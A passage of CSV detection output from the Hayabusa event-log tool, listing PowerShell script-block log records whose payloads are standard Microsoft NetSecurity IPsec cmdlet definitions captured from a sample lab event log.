[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecPhase1AuthSet' -Alias '*' function Rename-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.514 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if 